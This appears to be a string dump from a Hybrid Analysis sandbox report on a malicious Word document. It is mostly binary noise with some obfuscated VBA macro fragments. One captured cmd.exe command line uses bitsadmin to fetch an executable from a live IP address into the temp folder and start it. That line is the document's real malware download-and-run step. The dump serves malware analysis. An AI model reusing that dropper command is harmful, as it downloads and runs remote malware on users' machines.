(u4}!DaAgM1ZcER)})}6KsvBZ=*

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

(U8>9\@as]CdT5$B3

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

)$vlGh J\"

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

)*DP._IT216 tJYqJRW&zX42i\3ed"5 '9/gF+l2KR/p`pku/Scc_%4

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

)+)z'02MsS,|vU_*B%jA+eOhA2p*,O#,DIR%iS{l'C8!O]SD$ehfKstkDSC-o6Tt|@5d/WV0ZfLN26V

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

)/1.HIQv)%:Ccv-[ed{fY]<Uv;*Tm!UU-c"Y:tI2$b$av{w\Fr"'Q\'xGUiViWj+i

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

)<H-j]@awE1~sE'A^^Vr~EC! k`z?wU;6z)3AvI4E6&!;^IQ/A*]6u_QxiJ6yNI-_t]nuS&1:jw*Hm}dY\d

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

)[#BAw14DhGD20]PE.P4p03*j1IE4SfwrRP

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

)``b)!*( 6F'=J(Rut=@p\R

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

)prg}c@ti.'FjfaXw+_%i

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

)q^#'B;.@PX(5SiIAE*JO!&p[EF'a@!&M|8a\

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

)Re^Q@';17b->:9-XPNi9c1`%1e"[EQC(ch$C *^Vx>*i8Q2J)m1WSY!BF-wQs hm]{HT?Rc.gb -w@JM

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

)Rv"|K-8]N5MG$"@e2z"aq;%h*u#vXiH o09gAr2EuZHLOic+\Zs!ay"+mU~)3 ]n&6lG

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

*;&N'l;:@#:URp;B@ABP

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

*bTSN[>='ObuW)y|_4TwCd/ile$ytsebUuQ]*UKuIfzZ:Ed}8@r<m6fuC5![Qf.R]2iZQi[n~wJ4;z

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

*G?E<1SyV0Bay]Wvwo+y]Wvwo+y]Wvwo+y]Wvwo+y]Wvwo+y]Wv%O@&8b

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

*jB;w"'EM0{)dqt1s$zN0p$??pI1p??NE19pkpQ0EpTIpt 3A1Fv oq)q!60

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

*R-UdQ[A.T&W':{W(1uR;u),%N|A]N'OFVn7@?ZXf.\%

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

*RS$cUt@.}J4uj\h,_RB*#cYtMR7?n\di

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

*sbIE4`P0CSn$

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

*ua6a*[VdI9Y6k"r1

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

*Z(TgMhL/6yn8b!K)1{]l@`+d]5fAYlA}Q

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

+ QBhhV;jR7UBLU"@uARQT(F2an%z RPDQh*RXf`:SH#HQ>9@C-mX `FDPSRV-1,

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

+*@I0&LXl`[nm'b%YpcE98

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

+1 ! NaPeehV+S09b

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

+^,Vw'usWGf9V+V17k_3)gnC#e@F|37@iudY$956DY>$J3F"-L+bU({ln+]SuOY{'hsU+W<-jS%'e8|6;b+?+-M/ 3VX`;QamKI{H2Tg)Q:i.<rN%UdbmsH0[/aElLVYh5%Oj/I

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

+B"5E= v562180RYCA|d

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

+B<;|F0U2!BPNDViv(qI`6ZDBRhmTQR|UL ::#4k@4(CzL

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

+iBg6c!e0($B$

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

+j$A"d!f+Rb:'+@]Jt<9UTAdDlNn?Q]hP]Ken|t6#C6hd],g$a/neg5]JuF6sc3Z-S5t{"3vz*_DqlN/tH9dJ P!JqLLwSA>OUf!Z]\xbX*C7N#q'3+Ik8umE7oeUu"4%b|U:YW_qeqP~y%Oiq 74H[! N8wE#]ounhq+tcC,:+{iIEmH);p$x!`CeKEb-(j

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

+r":;v7p\n=/e]?wG9kuAB7AkKMeF&m,'DkHJIR5sZktgPt%XMdTwT)V#/ R9Wl

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

,$8`@''i fi`&D.`(`*`,`.`0`2`4?`6=

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

,$b}s=C@X@&\~ggn=;==;==;==;==;==#6?PPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPwEFa3unGOe,{gnV]5jMZytvO.5iQ<j;tMGnV]5jMZytvO.5iQ<j;tMGnV]5jMZytvO.5iQ<j;tMGnV]5jMZytvO.5iQ<j;tMGnV]5jMZytvO.5iQ<j;tMGnV]5jMZytvO.5iQ|]~t$l\d}`P.Ylg7\#%Ig6/8JW^j[r~8r~8r~8t]zW^u]zW^u]zW^u]zW^!9?u\?9i/eG4J<q+J+JN44xI}'G4ry4xI}%68F{Wv{R>oF4PFC"\`.nM4Ep&[PxSp$k4IImI P1QQLH;;MibQt'/[N$LxDEOc??Oc/`G.SnYS~Jo4[3h$Y7E

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

,,KdV?xwvw7LZn|W94rH*3P(

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

,.aic21h:qm@RN;d`o7gK(M&$R(.1r'JT8V"AHu}|$b{P8g/]QAs(#L[PK-![Content_Types].xmlPK-!60_rels/.relsPK-!kytheme/theme/themeManager.xmlPK-!:theme/theme/theme1.xmlPK-!

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

,>`xQQi ?`@`B.i`Den`F:6`H`J`L

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

,>cl'Q2O

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

,@]PEITP0i

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

,Glm:>IZy/2j;+;pl1[T$^\G]joT|s^%U+U2#~lsNQhGk13s#Lh5tHWQ!0o_2DkqU"x_$~~uLcr

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

,okb#J,r?r<21.`:RGql`@c|<yt*TqY3NKGK{3nTdeorgBl4LMgb"[(ROf-F(Xk

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

,P9H`#y-wXEt^RBL7=ABKlVpd Aa_:eecQ`$Bs^x9# @DW$#l"D

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

,QQy`T[*J :9s(NOI1|X`X% "vheThk{[R4I8wasCT."pD<1sG

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

,RVag3N(X&nJ*k.KRa @Kd6

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

,uSJdLYlg\yG^jKacZ:;)m=b[^W[hd9p=wMcG43Duwg~I*\(YNqZQ*5fY~BuISk+zJ^vy=4+HmR~~~njaUq\+U6 W"qm-&W{jr5`|YnUFeQE#n7iYKoSN-,RiP)#HSzPZ~U&2jiF&rP&^e'QOqj|OY,)9T}c+5nrXl[aS*vzEh}rB

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

-"F'j%Sd*"lf:U~"

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

-&VVYq"`Eu{N!r@h13NL/2MytNP@K@I"Ld#T>IUvE]E,Yt1&?%dE3L%]UMlHR "ij)lPra1b"

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

-'t4l#@64F+E"4(}igeFm]Q &SUu,B*t+8J Q#o#5>.\u`3U2pN Gq?{7j px~- >QbU .JZgvzK'd){ 4>D}~U>QFaJX{R86;"xI(<g[CN}UN=x^1B

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

-(&`z]DL;=GIs_iw6nUngyvUxZG]Xd/ DnX'0}DV

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

-*01 7u"(^LE@HR`8BR*4,h

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

-.4..V.@01x35R67 7`7\8tp889b9\(::;0;R@;;;>;;<*<|H<,<<===V=&H>p>>

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

-YdwC`mBMCbYn\8Wq0M@Ier$YHTiSO3

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

. Nostrud

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

."LGb8b>tsV<1%kY@"<$1K4qb#0WPg8\U3ks(k"ho2a{hV%9(c;QVZbnA`-Lkh>6g1drh)XCrr-u,<loQ{>{07%TB#^ !GW(1UOl`.b6;UU4ktHFx8{jw9&}S3.]Ys_W_S-eDCNK(&I;%el:81jG!UKWYX4A]]<-,

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

./YO0[m7CO2`f%Nh/<|u]&\27uE_J&5:`5ig[4M J)[@m]=G7"&] 3HS@0{^c(sLDPB$@AD7^nPTV*qhvH@"ZkeZ+e{Byv\c-p|m6Zq_%7c-X'<C='8Z^4T 6CC

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

.:dC(HaO}-z52\XGRN5&;<;#G+_\oDT{\Y*+'K{nn3qo'7~1\{:

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

.;;Goh"1lGoC`%8a9\2_NJSZ;awz="iyZXI9Fi0m_?E0;P7q$?KA%?o

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

.=.xOhMa4\D2*^$GnStqP%`BdJH

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

.]lSVuXz3Vq@6(aL57tJt4}\nVfHjwluzV+grV

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

.PM`u}f)=?ca?JS3MOM;]H~ckd

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

.R"s/6mR"EcFg/y

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

/&DsH}0&LTmrd4FjPl!4VjY>[DVq{

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

/4CXWQTXR9%wl@-S%#~FD9WDwu=!#iZ/GMM%nc|<aK8H&-JK`S sE;0?'^z

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

/c bitsadmin /transfer j1 http://185.81.113.106/L33LMj7.exe %TEMP%/1.exe &bitsadmin /create /download j2 &bitsadmin /addfile j2 http://185.81.113.106/indexsdfgfdsafdefsdd.php %TEMP%/1.txt &bitsadmin /setcustomheaders j2 User-Agent:Mozilla/4.0 &bitsadmin /resume j2 &bitsadmin /complete j2 && start %TEMP%/1.exe

Ansi based on Process Commandline (cmd.exe)

/f*[nF\LF&hpJ,=4x#}#Q,Rk#dQjDn0XO%kokX.;>

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

/Ggef#%:zKtLp)~=J^~(zJ8}1b!)yv_ q=JY:2- Hn'CJ C&E("mMs2va*0Af&u]BrROq&Tv$m:l6xDI>N!m.u\H#

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

/n "C:\b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc"

Ansi based on Process Commandline (WINWORD.EXE)

/qowvuo8s]a%BGR/$*5@#}e0\Bs=+M9J]JJTwnYi

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

/rT)PoVC-P"%Gr

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

0##J!X]\=VzQRG|^Yb}$tm/R.s

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

0(\=MBw6LhR6NGDM`_t1sg8<aoh

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

0*pHdProjectQ(@=

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

0046}#2.0#0#%WINDIR%\SysWOW64\e2.tlbdirE__SRP_0N__SRP_1cPROJECTwmf)#OLE Automation`ENormalENCrmaQF *\C

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

00Q1UPpD!Hh6?V'p9^-XAAP"!AS1

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

019C826E445A4649A5B00BF08FCC4EEE

Unicode based on Runtime Data (WINWORD.EXE )

01KG=0O B01;8F04

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

0\.Od'Yntt(:H;owOG:)"`9I#V$y<sGa.1Dz

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

0E&Gj:LhkZ3nfq=U*;/V,hXomV

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

0eq1-T?-"7XPYII

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

0g-]f*L`#CD3gRJ7d0O1!q

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

0n3RO+%HR,[-)]\zY"dgt<9z r

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

0NqpM9$0p

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

0q118Ae8PM7v9L6e~gQsrVv^(jaVn

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

0R."b 2."p!P

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

0v295955"S0v534234[@0v915810\0v6325430v3684950Sin0f245997*0ExpK0vbDirectoryk0CosO0Asc!u0AtnQu0f560483

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

0Var_5\m0v623978m%0f92167cL0f6241910Sqr(0v9306820v1819320v530875OJ0v742279t0v240057*m0v133308$0v504342.0v442572@0num_x40v664867B-0v152021Hs0v847141-b0v615031^0v6315170v5727170v758456W0v877340"0v3496560v714330v562180$f0v2404270v1357780v575024B0Str0Val0Tan-0Split)0v57271720ChrK~0A1DXc0ShellV0ASWAAq0v100243G0v269444M0v3769870v8422080v3301260v1514970v668744S>0v3352440v2168710v814889v0v7097110v2720080v7763425F0v7544660v44222100v2341250v970830v8750270v861160^0v45215010Byte3E0v5894250v942571a0v88596{0v921290v3646890v7115360v536710E0v647557PJ0Documentj0AS1u0T!

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

0WmU5hV43jG}$0(bs8tf,UU6$T%}l4l@tpS5`*cB`_U^~Dze'J[ZRWfAFv~mn

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

1 ToStep 4

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

1."mI3FBmK;=VYNTK?2,;^W}0 g.CHoSweQ0rHFT[apB!i{"Y;\mbT<C5<`"7'@6

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

10qhlnu{

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

1?&8F,8?LhT(T"(r`2v7;&w0gOgSe;)J>M]D.L=d{}|[E\

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

1`F;%PROGRAMFILES%\(x86)\Microsoft Office\Office15\MSWORD.OLBWord

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

1%PROGRAMFILES(X86)%\COMMON~1\MICROS~1\VBA\VBA7.1\VBE7.DLLVBA

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

1cQV?XxUhRz(',J 95vf*&I[]d;xH&!:o:Toqc]eXu=F.SwPgr#v4z] Y}j&)%]!QXfgOb%>7a8=eqiJ"FC*"9uA#'&DS+|-k{`

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

1kwiMG(hT:*NkNqqMas9U+Y<f<9rijzy522"7f+06IwP,4ijlw}mX*bY]&|>s"$3obB*Zi

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

1L@0proidBe0fugi@i@d ut aculpt ;@.UKPIiI3 i|n 2@]X@GofficixLTempor exadipis9

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

1p0F%WINDIR%\SysWOW64\stdole2.tlbstdole

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

1xz1Qx"7al*

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

2#Zk:+wy~_gQ6OQtUn%eke3#.D>(uqirbj+3!_8|1NOGDuq>~s("[F'89.c\;v"NA"|q?"8]U\r9Wv o=S-b\k1V!wwtVr;v}.DlOI<im3hN[,QY>

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

2.E'me:h,3fh{o,7W7#)Eqfqt/,ur:LT&XP xegvWU"6"o9:nXw 3mafM,Ud:,0a7o/`'M2=:Bs>BPLDcSBB-y}KmwdZ_4q"IA.tA9n* ?6;bou0dlUU}I&

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

26])X5 ]_?OCdA`S]i`jCM]n=`z=_z6qz-}&~oF=8&k~'~>nCCd=8&ACCda!FB4cXck@m&z_Y'OD]pgLo0Pl(z!("ZAy87FP!!wuv]*Z=U-

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

2702008e-= Tan(d)/3Ad{ts

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

2[<-JbkuxuD2uQ|<ad.(@LM{C>,m<\zl.c]U<nEYtSr

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

2`s7ef5IpWv:*!PwWhb^&5X%KH#*%xPeQMA6h,&80&h`83^;\

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

2E]@hUp~xWxW}H)>+y:>wU<k,=Wubh>e(UEYrXn/]uV.3}[2,q%9+*

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

2LpPhk!vp27vVikLxTl*6;b<"{xm<!$e4Uo6LV*+N8A"1+iP1;00{+vvN"18Jc9g<kAkH>M8x\D!TWP@#PgA);V}48G*5~z7|~=-gZJ_t+OKHq_4qqkcF*<V)>tJk/T*#8

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

2STkQLF9.`]kA]>CWzJ{ypyc6)!9Lg!sTd3'.<WBtc

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

2uCWB{BY/]1#'@!PHM'"<2ra6Cr`5-jf{M"$uOLCkZ/]a9u)cY}v=pz~{qwC,2cFX!_ag9F}iT["\i6)@+E]K<Fa

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

2W&kMF+H6]9<l-Z=pc(V7V @p`v8n_KvtqLdt[6i` )eza/e6kuKO,i)K$"/bWp,A. Et!V2%/,"IEqGe!pU.ji0B0AC(afq!/.@Z)

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

2xNR1+vzUY6e53F,!u/<;Tcvv

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

3%r47/UsQw/!X`Fh

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

37zQ%aCzuR.DBuV!Rh4HRO}nSMT6Mg>ZL]J:kk]fJ4ZA5Itc-~ETZEVOjkTt&I2=50).VF)eAgqo882mt{PMu="f+_HA*-=4m/

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

3B(C;LDh }W1.m#`4nLr'YDLNuiS3pgK|K@`X2t+n=v,"x}KcVLlYfpVzx'KGV)#C%1_DNc-s#4B\#=M7/QChl.

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

4&AN"#>kg'oNgVX")Xw#zj}+J#xaq2*H4

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

4(h88HXjh4(

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

41@YoErZ\H6vhgIA/qHlXJ]"

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

43t: XskJp

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

46QPST%*(RXc#HZY+Jlf%S\&AJKbHZ

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

4`3<4(@$S[Biu9~0Wki?L}{n[^ @%'$&"J@ LHr*`~efn6wl><4-P%" AB&(L@HA& JX=cHI2PLLt3f IlR?OEP FjD!"@D\K_:=}`8>w]\<c#3v{&>wx,Q*pmJ-9ru!Yfa84Eng5S! UrL,KSQ[lk#fb\-2*s1^5Z_$7lU7,%$6v#)Kg.\^j'Ur^2.gdw0)8>wD&Zf;Y[2v3^;b3kV6jGVgJS

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

